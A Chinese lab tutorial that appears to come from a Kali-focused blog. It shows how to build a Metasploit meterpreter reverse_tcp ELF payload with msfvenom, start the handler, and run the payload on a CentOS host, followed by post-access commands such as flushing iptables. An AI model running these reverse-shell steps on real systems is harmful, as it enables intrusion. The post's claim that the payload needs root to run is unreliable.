浅谈如何上线Linux主机

逍遥子大表哥

发布于 2025-09-03 18:56:02

16300

代码可运行

文章被收录于专栏：kali blogkali blog

运行总次数：0

代码可运行

在前面的文章中，我们讲到了如何利用msf上线windows主机。本文我们来谈谈在Linux平台如何在MSF中上线！

实验环境

Centos7
kali Linux

生成shell

我们首先里面msf来生成相关Linux平台下的可执行shell。命令如下：

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.123.43 lport=5555 -f elf -o kali.elf

配置msf

msfconsole
handler -H 192.168.123.43 -P 5555 -p linux/x86/meterpreter/reverse_tcp

将生成的kali.elf上传到服务器。并添加可执行权限。

#添加权限
chmod +x kali.elf
#运行
./kali.elf
#后台运行
./kali.elf &

需要注意的是，在实际工作中，个人感觉Linux的安全性能相对来说比Windows要安全。即使将shell上传，没有root权限程序是无法运行的。当然还需要root权限来开启相应的端口。如下，我们运行程序后，成功得到会话信息。

在Linux中常用的命令

获取系统架构等信息

uname -a

进程相关

ps -elf     // 列出当前进程快照
ps aux     // 列出当前进程快照
top

服务状态

service --status-all      // 检查所有服务状态
systemctl -a        // 列出安装在文件系统中的所有单元.
service servicename start
systemctl start servicename     // 启动某个服务
service servicename stop
systemctl stop servicename     // 停止某个服务
service servicename status
systemctl status servicename    // 显示某个服务状态信息
cat /etc/services       // /etc/services将端口号映射到指定的服务

防火墙

iptables -L         // 列出所有规则链。
iptables -F         // 删除选定规则链中的所有规则.
iptables -A INPUT -p icmp -m icmp –icmp-type 0 -j ACCEPT // 请执行iptables -p icmp –help 获得更多信息.
iptables -A INPUT -p tcp -m tcp –sport 80 -m state –state RELATED,ESTABLISHED -j ACCEPT //开放80端口                              
iptables -A OUTPUT -p tcp -m tcp –sport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT

其他的，我们就不再多说了。也可以利用msf进入Linux的shell环境。因为权限比较高，可以在shell中执行更多的操作。

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2025-08-24，如有侵权请联系 cloudcommunity@tencent.com 删除

权限